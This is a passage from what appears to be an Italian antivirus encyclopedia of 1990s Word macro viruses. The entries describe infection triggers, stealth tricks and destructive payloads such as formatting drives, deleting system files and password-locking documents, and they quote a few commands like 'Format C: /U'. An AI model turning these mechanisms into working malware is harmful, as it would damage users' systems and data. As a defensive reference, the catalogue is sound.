aperto un documento infetto, Epidemic infetta il modello di documento principale (normal.dot). Altri documenti divengono infetti quando sono aperti (AutoOpen) o quando parte Microsoft Word (AutoExec). Epidemic possiede diverse procedure distruttive: 1. Il 27 aprile, Epidemic formatta l'hard disk (simile a FormatC). 2. Il 17 giugno, usa DEBUG.EXE per spostare le istruzioni del virus basato sul DOS "Natas" nel file con estensione *.COM in C:\MOUSE. Modifica inoltre C:\AUTOEXEC.BAT per chiamare C:\MOUSE.COM al successivo avvio. 3. Il 10 ottobre, cancella i seguenti file: " C:\IO.SYS " " C:\MSDOS.SYS " " C:\COMMAND.COM " Questa operazione renderα inavviabile il computer. Compare quindi il seguente messaggio: " EPIDEMIC Macro Virus V1.1 " Epidemic lavora solo con la versione cinese di Microsoft Word. [Word_Trojan.FormatC (a.k.a. TrojanFormat)] Nome del virus: Word.Trojan.FormatC (a.k.a. TrojanFormat) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 81 Byte Paese di origine: Inviato su Usenet Data di origine: Sconosciuta Distruttivo: Si Rilevato In The Wild: No Descrizione: FormatC non Φ un virus ma un cavallo di Troia, che non si replica. Quando viene aperto un documento infetto, il cavallo di Troia attiva la procedura distruttiva, che scrive in una piccola finestra di DOS " Format C: /U " quindi formatta il drive C. FormatC non diffonde facilmente dato che non infetta altri file. [Word_Friendly.A:De] Nome del virus: Word.Friendly.A:De Tipo di Virus: Virus da macro di Word Numero di Macro: 20 Criptato: No Nomi delle Macro: Abbrechen, AutoExec, AutoOpen, Cancel, DateiBeenden, DateiNeu, DateiOeffnen, DateiSchliessen, DateiSpeichern, DateiSpeichernUnter, ExtrasMacro, ExtrasMakro, Fast, File/Esci, File/Nuovo, File/Apri, File/Salva, File/Salva con nome, Infizieren, Talk Lunghezza della Macro: 9867 Byte Paese di origine: Germania Data di origine: Maggio 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: Friendly rappresenta lo sforzo di scrivere un virus per diverse lingue in modo da ovviare agli errori di traduzione (ExtrasMacro al posto di Strumenti/Macro) Friendly lavora solo con la versione tedesca di Microsoft Word. Friendly cerca di infettare il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Controlla un'eventuale precedente infezione del modello di documento principale cercando il testo "Friendly", Author = Nightmare". Dopo che la macro Φ stata trasferita la procedura distruttiva viene chiamata dalla macro "Fast". Friendly infetta altri documenti ogni volta che ne viene creato uno nuovo, che un'azione viene cancellata, che vengono aperti, chiusi salvati dei documenti o che si esce da Word. Friendly non controlla una precedente infezione del documento. Sovrascrive semplicemente le macro esistenti. La procedura distruttiva, nella macro "Fast", viene chiamata quando l'orologio di sistema ha il valore dei secondi inferiore a 2. Friendly crea quindi uno script di debug nella directory C:\DOS ed esegue il comando DOS DEBUG.EXE. Inoltre, Friendly aggiunge un'entrata in AUTOEXEC.BAT, cos∞ il virus basato su DOS si attiva al successivo riavvio. Il virus basato sul DOS dentro a Friendly ha una lunghezza di 395 Byte ed Φ un virus companion residente in memoria criptato con CryptCOM. Friendly mostra il 1 gennaio il seguente testo: " Ein gutes neues Jahr ! " ed infetta i file con estensione *.EXE all'esecuzione. File con estensione *.COM vengono creati con lo stesso nome dei file con estensione *.EXE e con gli attributi "READ-ONLY" e "HIDDEN." Se il virus Φ attivo, compare il seguente testo quando si cerca di far comparire la lista della macro: "You can't do that!" "I'm very anxious!" "Hello my friend!" "<< Friends >> Virus" (tradotto:) "Du kannst das nicht tun!" "Ich bin sehr aengstlich!" "Hallo mein Freund!" "<< Friends >> Virus" Dopo il 1 maggio, Friendly mostra il seguente testo quando infetta dei documenti per la prima volta (tranne NORMAL.DOT). "Hallo mein Freund!" "Ich bin der << Friends >> Virus und wie heißt du?" "Gib doch bitte anschließend unten deinen Namen ein:" "Also ..... ich habe eine gute und eine schlechte Nachricht fuer dich!" "Die schlechte Nachricht ist, daß ich mich auf deiner Platte eingenistet" "habe und die gute ist, daß ich aber ein freundlicher und auch nuetzlicher" "Virus bin. Druecke bitte OK fuer Weiter!" "Wenn du mich nicht killst, dann fuege ich ein Programm in deine" "Autoexec.bat ein, daß deine lame Tastatur etwas auf Touren bringt." "Also ...., gib dir einen Ruck und kill mich nicht. Goodbye!" (tradotto:) "Hello my Friend!" "I'm the << Friends >> Virus and how are you?" "Can you give me your name, please?" "Hello .... I have a good and a bad message for you! The bad message is that" "you have now a Virus on your Harddisk and the good message is that I'm" "harmless and useful. Press OK!" "If you don't kill me, I will insert a programme in your AutoExec.bat thats" "your Keyboard accelerated. Please .... don't kill me. Goodbye!" Comparirα quindi il nome inviato. [Word_Fury.A (a.k.a. Greenfury)] Nome del virus: Word.Fury.A (a.k.a. Greenfury) Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: Si Nomi delle Macro: GreenFury, GGGFFF (FileSalvaConNome), FFFGGG, AutoOpen Lunghezza della Macro: 2322 Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: Si Rilevato In The Wild: No Descrizione: Fury Φ un altro virus che lavora solo con la versione italiana di Microsoft Word. Fury infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono salvati con il comando "FileSalvaConNome --> tradotto: FileSaveAs". Quando Fury viene caricato in una versione di Word non italiana, cancella tutti i file nella directory corrente. Fury mette una password casuale al documento attivo. [Word_FutureNot.A (a.k.a. Anti-IVX, Future)] Nome del virus: Word.FutureNot.A (a.k.a. Anti-IVX, Future) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 2 (nel modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (File/Salva con nome) Lunghezza della Macro: Polimorfica Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: FutureNot Φ il primo virus da macro polimorfico. Quando viene aperto un documento infetto, FutureNot infetta il modello di documento principale. Crea due macro nel modello di documento principale. Una Φ sempre "File/Salva con nome" e la seconda Φ una copia di "AutoOpen" con un nome scelto a caso Mentre la seconda macro rimane la stessa, la macro File/Salva con nome cambia a causa dei commenti selezionati a caso. Aggiunge il seguente commento al termine del file: " @ATTRIB -R C:\MSOFFICE\WINWORD\TEMPLATE\NORMAL.DOT > NUL " Questo elimina l'attributo Read-Only dal modello di documento principale. [Word_Gangsterz.A (a.k.a Big Daddy Cool, Daddy)] Nome del virus: Word.Gangsterz.A (a.k.a Big Daddy Cool, Daddy) Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: Gangsterz, Paradise Lunghezza della Macro: 4250 Byte Paese di origine: Germania Data di origine: Sconosciuta Payload: Si Rilevato In-The-Wild: No Descrizione: Gangsterz utilizza un nuovo meccanismo di attivazione. AnzichΘ usare le macro automatiche (AutoOpen, etc.) o ridefinire i comandi di Word, usa assegnare delle chiavi per far partire le sue macro. La macro "Gangsterz" Φ associata alla pressione del tasto space e la macro "Paradise" alla pressione di "e." se si preme uno di queste due tasti mentre si lavora in un documento infetto, le macro associate vengono attivate. Se un documento viene infettato il giorno 1 gennaio, viene creato un nuovo documento con il seguente testo: " Big_Daddy_Cool virus generated by NJ " e lo riempie con uno scorrere di O. Se il valore di XOP, regolato nella sezione [intl] di win.ini, Φ impostato su "Installed", Gangsterz crea un file di batch (XOP.bat) dopo che il virus si attiva. Aggiunge una linea al file C:\AUTOEXEC.BAT per far partire il virus. [Word_Goldfish.A (a.k.a Fishfood)] Nome del virus: Word.Goldfish.A (a.k.a Fishfood) Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoOpen, AutoClose Lunghezza della Macro: 9867 Byte Paese di origine: USA Data di origine: Luglio 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: Goldfish infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono anch'essi aperti ("AutoOpen"). Goldfish Φ uno dei pochissimi virus da macro non-distruttivi. Infetta solo altri file e mostra il seguente messaggio: " I am the goldfish, I am hungry, feed me. " Il messaggio non scompare fino a quando non si digita una risposta accettabile. Le risposte valide sono: "fishfood" "worms" "worm" "pryme" "core" [Word_GoodNight.A] Nome del virus: Word.GoodNight.A Tipo di Virus: Virus da macro di Word Numero di Macro: 10 Criptato: No Nomi delle Macro: Exit, AutoExec, AutoExit, AutoOpen, File/Apri, File/Salva, AutoClose, FileClose, File/Salva con nome, FileCloseAll Lunghezza della Macro: 4992 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Payload: Si Rilevato In-The-Wild: Si Descrizione: GoodNight.A infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose, FileClose, AutoExit, and FileCloseAll) o salvati (File/Salva and File/Salva con nome). Quando GoodNight si attiva, cerca di uscire da Microsoft Word. GoodNight.A si trasforma in GoodNight.A1 (9 macro con 4431 Byte) e poi in GoodNight.A2 (6 macro con 2763 Byte). GoodNight.A2 non Φ in grado di diffondere ulteriormente, non infetta altri documenti. [Word_Haggis.A] Nome del virus: Word.Haggis.A Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 300 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Payload: Si Rilevato In-The-Wild: No Descrizione: Haggis infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono anch'essi aperti (AutoOpen). Haggis rimuove "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un documento infetto (chiamata tecnica macro stealth). Quando Haggis si attiva, imposta la password " Haggis " per attivare il documento. Se si trova un documento con una password sconosciuta, scaricare una copia di WinWord Password Recovery Tool (wwprt). E' disponibile all'indirizzo: www.vdsarg.com. [Word_Hassle.a (a.k.a Bogus)] Nome del virus: Word.Hassle.a (a.k.a Bogus) Tipo di Virus: Virus da macro di Word Numero di Macro: 7 Criptato: Si Nomi delle Macro: AutoClose, Strumenti/Macro, Microsoft01, Microsoft02, Microsoft03, Microsoft04, Microsoft05 Lunghezza della Macro: 8283 Byte Paese di origine: USA Data di origine: Agosto 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: Hassle Φ un altro virus che utilizza la macro "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un documento infetto (chiamata tecnica macro stealth). Se si seleziona un comando qualsiasi, il virus mostra il seguente messaggio e chiude Microsoft Word: " Out of Memory or System Resources " Hassle Φ uno dei pochissimi virus da macro non distruttivo. Infetta solo altri file e mostra la seguente finestra: " Are you sure to Quit? " questo si verifica raramente, con il 5% di probabilitα. Un'altra procedura chiede all'utente di registrare un software con Microsoft. Hassle accetterα solo: "Bill Gates", "Microsoft" e "666" Ogni volta che si seleziona il comando Tools/Macro, Hassle mostrerα il seguente testo sullo schermo in basso: " Microsoft Word Assistant Version 6.2 " [Word_Hellga.A (a.k.a DNZ, Hellgate)] Nome del virus: Word.Hellga.A (a.k.a DNZ, Hellgate) Tipo di Virus: Virus da macro di Word Numero di Macro: 10 Criptato: Si Nomi delle Macro: AutoClose, DnZ, EditCut, EditCopy, File/Nuovo, File/Esci, FileTemplates, ToolsSpelling, Strumenti/Macro, ToolsCustomize Lunghezza della Macro: 2498 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Payload: Si Rilevato In-The-Wild: No Descrizione: Hellga infetta ogni volta che viene chiamata la macro "DnZ" da una delle macro del virus. Infetta quindi il modello di documento principale (normal.dot) ed altri documenti. Hellga aggiunge inoltre la regolazione "Program=Installed" alla sezione [Demo] di win.ini (cartella di Windows). Il seguente messaggio compare il 9 marzo di ogni anno: " WM.DnZ " " Written by Bill_HellGateS " [Word_Helper.A] Nome del virus: Word.Helper.A Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 409 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Payload: Si Rilevato In-The-Wild: Si Descrizione: Helper infetta il modello di documento principale (normal.dot) quando viene chiuso un documento infetto. Altri documenti divengono infetti quando sono anch'essi chiusi. Quando un documento viene chiuso il giorno 10 di ogni mese, Helper attiva la sua procedura distruttiva. Imposta la seguente password per salvare il documento: " help " [Word_Helper.B] Nome del virus: Word.Helper.B Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 409 Byte Paese di origine: Sconosciuto Data di origine: 1997 Payload: No Rilevato In-The-Wild: Si Descrizione: Helper.B infetta il modello di documento principale (normal.dot) quando viene chiuso un documento infetto. Altri documenti divengono infetti quando sono anch'essi chiusi. La maggior differenza tra questa nuova versione ed il virus Helper.A originale Φ che la procedura Φ stata modificata. In seguito ad un errore, Helper.B non salva i documenti con la password "help". [Word_Helper.C] Nome del virus: Word.Helper.C Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 410 Byte Paese di origine: Europa Data di origine: Aprile 1997 Payload: No Rilevato In-The-Wild: No Descrizione: Helper.C infetta il modello di documento principale (normal.dot) quando viene chiuso un documento infetto. Altri documenti divengono infetti quando sono anch'essi chiusi. La maggior differenza tra questa nuova versione ed il virus Helper originale Φ che qualcuno cerc≥ di cambiare la data d'attivazione e la password. Helper.C non attiva la sua procedura da quando un importante modifica nel suo codice Φ andata persa. [Word_Helper.D] Nome del virus: Word.Helper.D Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 412 Byte Paese di origine: Europa Data di origine: Aprile 1997 Payload: No Rilevato In-The-Wild: No Descrizione: Helper.D infetta il modello di documento principale (normal.dot) quando viene chiuso un documento infetto. Altri documenti divengono infetti quando sono anch'essi chiusi. La maggior differenza tra questa nuova versione ed il virus Helper originale Φ che qualcuno cerc≥ di cambiare la data di attivazione e la password. Helper.D non attiva la sua procedura da quando un importante modifica nel suo codice Φ andata persa. [Word_Helper.E] Nome del virus: Word.Helper.E Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 416 Byte Paese di origine: Europa Data di origine: Aprile 1997 Payload: No Rilevato In-The-Wild: No Descrizione: Helper.E infetta il modello di documento principale (normal.dot) quando viene chiuso un documento infetto. Altri documenti divengono infetti quando sono anch'essi chiusi. La maggior differenza tra questa nuova versione ed il virus Helper originale Φ che qualcuno cerc≥ di cambiare l a data di attivazione e la password. Helper.E non attiva la sua procedura da quando un importante modifica nel suo codice Φ andata persa. [Word_Hiac.A] Nome del virus: Word.Hiac.A Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoClose, HI (AC) Lunghezza della Macro: 576 Byte Paese di origine: Australia Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: Si Descrizione: Hiac.A Φ un altro virus che non fa nient'altro che infettare altri file. L'infezione si verifica quando si chiude un documento (AutoClose). Il suo codice Φ difettoso ed il file di modello di una parte dei documenti infetti non Φ impostato, per questo Φ improbabile che diffonda il suo codice ad altri file. [Word_Hot.A] Nome del virus: Word.Hot.A Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: Si Nomi delle Macro: AutoOpen, DrawBringInFrOut, InsertPBreak, ToolsRepaginat, File/Salva con nome, StartOfDoc Lunghezza della Macro: 5515 Byte Paese di origine: Sconosciuto Data di origine: Gennaio 1996 Distruttivo: Si Rilevato In The Wild: Si Descrizione: Quando viene aperto un documento infetto il virus viene attivato dalla macro AutoOpen. Alcuni campioni copie di Hot mostrano il seguente messaggio d'errore: " Unable to load the specified library " Hot chiude i suggerimenti di Word per assicurare una infezione nascosta del modello di documento principale (normal.dot). Controlla inoltre il file "WINWORD6.INI" per verificare la presenza della sezione: "QLHot". Se non Φ presente, Hot registra una "hot date", 14 days in the future. Se questa versione non Φ giα set, il modello di documento principale diviene infetto. L' InsertPBreak/InsertPageBreak inserisce un'interruzione di pagina nel documento corrente. Tuttavia viene anche usato dal virus per valutare che un documento sia stato giα infettato. Alcune macro vengono rinominate quando sono copiate usando il comando di WordBasic "MacroCopy": "AutoOpen" diventa "StartOfDoc" "DrawBringInFrOut" diventa "AutoOpen" "InsertPBreak" diventa "InsertPageBreak" "ToolsRepaginat" diventa "File/Salva" Inoltre, il modello di documento principale contiene le seguenti macro: "File/Salva" (simile a "ToolsRepaginat") "StartOfDoc" (simile a "AutoOpen") Hot usa funzioni speciali del file di Windows "KERNEL.EXE" (Win API). Usa API per trovare il percorso di Windows ed aprire i file con funzioni semplici. Si deve notare che molte altre opzioni erano utilizzabili dall'autore del virus La procedura distruttiva, che Φ raggiunta all'arrivo della "hot date" impostata nella sezione "QLHot" nel file WINWORD6.ini, cancella il testo dal documento attivo corrente. Questa procedura viene aggirata se il file EGA5.CPI Φ presente nella directory "C:\DOS". Un commento nel codice del virus suggerisce che si tratta di un "caratteristica" creata per proteggere l'autore del virus ed i suoi amici. [Word_Hunter.A:De (a.k.a. Headhunter V 3.0)] Nome del virus: Word.Hunter.A:De (a.k.a. Headhunter V 3.0) Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: AutoOpen, DateiNeu, ExtrasMakro Lunghezza della Macro: 1051 Byte Paese di origine: Germania Data di origine: Primavera 1997 Payload: Si Rilevato In-The-Wild: No Descrizione: Hunter.A non infetta il modello di documento principale. Salva un documento infetto nella directory Word STARTUP (WINWORD.DOT), che viene utilizzata per infettare documenti quando vengono creati (DateiNeu - translated: File/Nuovo). Hunter.A utilizza"ExtrasMakro" per rendere pi∙ difficile l'identificazione di un documento infetto (chiamata tecnica macro stealth). Quando Hunter.A si attiva (probabilitα di 1/60), compare il seguente messaggio: " One - You lock the target " " Two - You bait the line " " Three - You slowly spread the net " " And Four - You catch the man " Hunter.A utilizza il linguaggio specifico delle Macro, perci≥ lavora solo con la versione tedesca di Microsoft Word. [Word_Hunter.B:De (aka Headhunter V 3.1)] Nome del virus: Word.Hunter.B:De (aka Headhunter V 3.1) Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: AutoOpen, DateiNeu, ExtrasMakro Lunghezza della Macro: 1126 Byte Paese di origine: Germania Data di origine: Primavera 1997 Payload: Si Rilevato In-The-Wild: No Descrizione: La differenza maggiore tra questa nuova versione e il virus Hunter.A originale Φ che Hunter.B contiene dei codici modificati. Hunter.B non infetta il modello di documento principale. Salva un documento infetto nella directory Word STARTUP (WINWORD.DOT), che viene utilizzata per infettare documenti quando vengono creati (DateiNeu - translated: File/Nuovo). Hunter.B utilizza"ExtrasMakro" per rendere pi∙ difficile l'identificazione di un documento infetto (chiamata tecnica macro stealth). Quando Hunter.B si attiva (probabilitα di 1/60), compare il seguente messaggio: " One - You lock the target " " Two - You bait the line " " Three - You slowly spread the net " " And Four - You catch the man " Hunter.B utilizza il linguaggio specifico delle macro, perci≥ lavora solo con la versione tedesca di Microsoft Word. [Word_Hunter.C:De (aka Headhunter V 3.5)] Nome del virus: Word.Hunter.C:De (aka Headhunter V 3.5) Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: AutoOpen, DateiNeu, ExtrasMakro Lunghezza della Macro: Polimorfica Paese di origine: Germania Data di origine: Primavera 1997 Payload: Si Rilevato In-The-Wild: No Descrizione: La differenza maggiore tra questa nuova versione e i precedenti virus Hunter Φ che Hunter.C aggiunge testo alle sue macro, il che lo rende un virus polimorfico. Hunter.C utilizza la stessa "ExtrasMakro" delle versioni A e B per rendere pi∙ difficile l'identificazione di un documento infetto (chiamata tecnica macro stealth). Hunter.C utilizza il linguaggio specifico delle macro, peci≥ lavora solo con la versione tedesca di Microsoft Word. [Word_Hybrid.A] Nome del virus: Word.Hybrid.A Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: AutoOpen, AutoClose, File/Salva con nome Lunghezza della Macro: 2815 Byte Paese di origine: Sconosciuto Data di origine: Gennaio 1997 Distruttivo: No Rilevato In The Wild: Si Descrizione: Come suggerisce il nome, il virus Hybrid Φ una combinazione di virus con una macro della soluzione anti-virus. La sua macro "AutoClose" macro Φ stata catturata da una ben nota soluzione anti-virus, finora inutile, chiamata ScanProt (scritta da Microsoft). Hybrid si attiva quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono salvati con il comando "File/Salva con nome". Hybrid Φ stato trovato In-the-Wild e pu≥ essere rilevato/disinfettato con qualsiasi soluzione anti-virus. [Word_Hybrid.B] Nome del virus: Word.Hybrid.B Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen, AutoClose, File/Salva con nome Lunghezza della Macro: 2815 Byte Paese di origine: Sconosciuto Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Hybrid.B Φ una nuova versione del virus originale Hybrid.A. La sola differenza tra i due virus Φ che la macro "AutoClose" , catturata dalla macro della soluzione anti-virus ScanProt, Φ alterata. A causa di questa modifica Microsoft Word mostra un messaggio di errore di Word Basic ogni volta che viene chiuso un documento. "Unknown Command, Subroutine or Function" Per ulteriori informazioni vedere la descrizione del virus Hybrid.A. [Word_Hybrid.C] Nome del virus: Word.Hybrid.C Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: AutoOpen, AutoClose, File/Salva con nome Lunghezza della Macro: 2815 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Hybrid.C Φ una nuova versione del virus Hybrid.A originale. L'unica differenza tra i due virus Φ che la macro "AutoClose", catturata dalla macro della soluzione anti-virus Scan Prot, Φ alterata. A causa di questa modifica Microsoft Word mostra un messaggio di errore quando si cerca di chiudere un file: " syntax error " Per ulteriori informazioni vedere la descrizione del virus Hybrid.A. [Word_Imposter.A] Nome del virus: Word.Imposter.A Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: No Nomi delle Macro: AutoClose, DMV (File/Salva con nome) Lunghezza della Macro: 907 Byte Paese di origine: Inghilterra Data di origine: Marzo 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: Imposter infetta il modello di documento principale (normal.dot) quando viene chiuso un documento infetto e le macro "DMV" e "File/Salva con nome" non esistono. Quando Imposter.A copia la macro "DMV", la rinomina "File/Salva con nome" e compare il seguente messaggio: " DMV " Altri documenti divengono infetti quando viene usato il comando "File/Salva con nome". Il seguente testo si pu≥ ritrovare all'interno di Imposter.A, ma non viene mostrato: " just to prove another point " Questo testo si basa sul virus Concept, che possiede "this is enough to prove my point" nel suo codice. [Word_Imposter.B] Nome del virus: Word.Imposter.B Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: No Nomi delle Macro: AutoClose, DMV (File/Salva con nome) Lunghezza della Macro: 907 Byte Paese di origine: Inghilterra Data di origine: Marzo 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: l'unica differenza tra questa nuova versione e il virus Imposter originale Φ l'ortografia del commento nel codice del virus. Per ulteriori informazioni vedere la descrizione del virus Imposter.A. [Word_Irish.A] Nome del virus: Word.Irish.A Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: AutoOpen, WordHelp, AntiVirus, WordHelpNT Lunghezza della Macro: 4152 Byte Paese di origine: USA Data di origine: Primavera 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: Irish infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando viene utilizzato il comando "File/Salva". Due macro, "WordHelp" e "WordHelpNT", non girano automaticamente. Tuttavia, se vengono eseguiti manualmente, colorano di verde il Windows desktop. La macro "WordHelpNT" contiene una procedura che cerca di attivare il salva schermo e compare il seguente messaggio: " Happy Saint Patties Day " La procedura per≥ sembra difettosa e non lavora con Windows 95 (Irish esiste solo in Microsoft Word). [Word_Italian.A] Nome del virus: Word.Italian.A Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: FileMacro, FileChiudi, FileEsci, FileSalva, WordMacro1, WordMacro2 Lunghezza della Macro: 1438 Byte Paese di origine: Italia Data di origine: Gennaio 1996 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Italian Φ il primo virus scritto per la versione italiana di Microsoft Word. Quando viene aperto un documento infetto i giorni 7, 13, 17 o 31 di ogni mese compare il seguente messaggio: " Your PC is infected by " " Word.Macro.ITALIAN Virus " " Written Jan,1996. " [Word_Johnny.A(GoJohnny)] Nome del virus: Word.Johnny.A (GoJohnny) Tipo di Virus: Virus da macro di Word Numero di Macro: 5 o 6 Criptato: Si, 4/5 o 5/6 Nomi delle Macro: Presentv, AutoOpen, Presentw, File/Salva con nome. Presentz, File/Salva, vGojohnny Lunghezza della Macro: 3393 Byte nei file .doc, 4955 Byte nel modello di documento principale Paese di origine: Sconosciuto Data di origine: Sconosciuta Payload: Si Rilevato In-The-Wild: No Descrizione: Johnny infetta il modello di documento principale (normal.dot) quando viene aperto un file infetto. Altri documenti divengono infetti quando sono salvati con il comando "File/Save" o "File/Save as". Quando Johhny si attiva, crea un nuovo documento avente il seguente testo: " NAIPESVOH REHM " successivamente inserisce il seguente messaggio sulla barra di stato: " Starting Autosave " Per rendere pi∙ difficile l'identificazione di un'infezione, Johnny chiude i suggerimenti di Word prima di infettare il modello di documento principale. [Word_Johnny.B] Nome del virus: Word.Johnny.B Tipo di Virus: Virus da macro di Word Numero di Macro: 5 (o 6) Criptato: Si Nomi delle Macro: AutoOpen, Presentv, Presentw, Presentz, vGoJohnny Lunghezza della Macro: 3992 Byte Paese di origine: Regno Unito Data di origine: Gennaio 1997 Payload: Si Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione e il virus Johnny.A originale Φ che Johnny.B Φ in grado di infettare la versione francese di Microsoft Word. Vengono cambiate le seguenti due macro: "FichierEnregistre" al posto di "File/Salva" e "FichierEnregistreSous" al posto di "File/Salva con nome". Per ulteriori informazioni vedere la descrizione del virus Johnny.A. [Word_Kerrang.A] Nome del virus: Word.Kerrang.A Tipo di Virus: Virus da macro di Word Numero di Macro: 5 Criptato: Si Nomi delle Macro: AutoExec, File/Apri, File/Salva con nome, FilePrintDefault, Strumenti/Macro Lunghezza della Macro: 972 Byte Paese di origine: Sconosciuto Data di origine: Febbraio 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: Kerrang si attiva quando viene aperto un documento infetto. Dopo che il modello di documento principale Φ stato infettato, disabilita la protezione da virus di Microsoft Word ogni volta che viene fatto partire Microsoft Word (AutoExec). Altri documenti divengono infetti quando sono salvati con i comandi File/Salva e File/Salva con nome. Kerrang utilizza "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). Quando si selezione questa opzione, Kerrang crea 65 nuovi documenti. Kerrang possiede diverse procedure. Controlla l'ora di sistema, se sono le ore 18:00 (6:00 del pomeriggio) aggiunge al documento stampato il seguente testo: " Kerbaffely Urgo Kerranga! Kerranga!!!! " Successivamente usa la sua seconda procedura che cancella tutti i file con estensione *.DOC nella directory corrente. [Word_KillDll.A] Nome del virus: Word.KillDll.A Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 284 Byte Paese di origine: Sconosciuto Data di origine: Estate 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: KillDLL si attiva quando viene aperto un documento infetto (AutoOpen). KillDLL Φ uno dei pochissimi virus distruttivi. Ad ogni avvio di Word, cancella tutti i file nella directory WINDOWS, unendo le estensioni: *.D?? I pi∙ colpiti sono i file .DLL ed i file .DRV, essenziali per Microsoft Windows. [Word_KillPort.A] Nome del virus: Word.KillProt.A Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: Si Nomi delle Macro: AutoExec, File/Apri, File/Salva con nome, Strumenti/Macro Lunghezza della Macro: 2272 Byte Paese di origine: Sconosciuto Data di origine: 1997 Payload: Si Rilevato In The Wild: No Descrizione: KillProt.A infetta il modello di documento principale quando viene aperto un documento infetto (File/Apri) o viene selezionato il comando Strumenti/Macro. Altri documenti divengono infetti quando sono aperti (File/Apri) o salvati (File/Salva con nome). Venne scelto il nome KillProt perchΘ cancella le seguenti macro: "AutoExit" "InstVer" "ShellOpen" Sono tutte localizzate nella soluzione della macro anti-virus "ScanProt". KillProt modifica anche le impostazioni di .INI nella cartell di Windows. Crea la porte "Count=xxx" nella sezione "Infector". Ogni volta che viene salvato un documento con il comando File/Salva con nome, KillProt aumenta il valore. La procedura si attiva ogni 10 documenti salvati. Aggiunge quindi ai documenti salvati la seguente password: " WhatTheHell " [Word_MVDK1(Kit)] Virus Kit Name: Word.MVDK1 (Kit) Tipo di Virus: Virus da macro di Word Lunghezza dei documenti: 23618 Byte Numero di Macro: 5 Paese di origine: Russia Data di origine: Estate 1996 Descrizione: MVDK non genera virus pronti a partire (ready-to-run). Crea solo le istruzioni del virus, che Φ messo in formato di testo e salvata nella cartella C:\. I documenti infetti sono stati creati dall'autore. La funzione per infettare il modello di documento principale ed i documenti viene posta in una macro principale, il cui nome le Φ stato dato dallo stesso autore del virus. La macro AutoOpen macro Φ sempre presente, mentre altri metodi di infezione possono essere aggiunti (infezione di File/Apri, File/Nuovo e File/Salva). MVDK possiede diverse procedure: 1. cancellazione dei file di sistema 2. salvataggio di file con una password (ad un determinato giorno ed ora) 3. si inserisce in un programma DOS (o virus) Come conseguenza, "File/Salva con nome" e "PayLoad" possono essere presenti nel codice del virus. [Word_Kompu.A] Nome del virus: Word.Kompu.A Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: No Nomi delle Macro: AutoOpen, 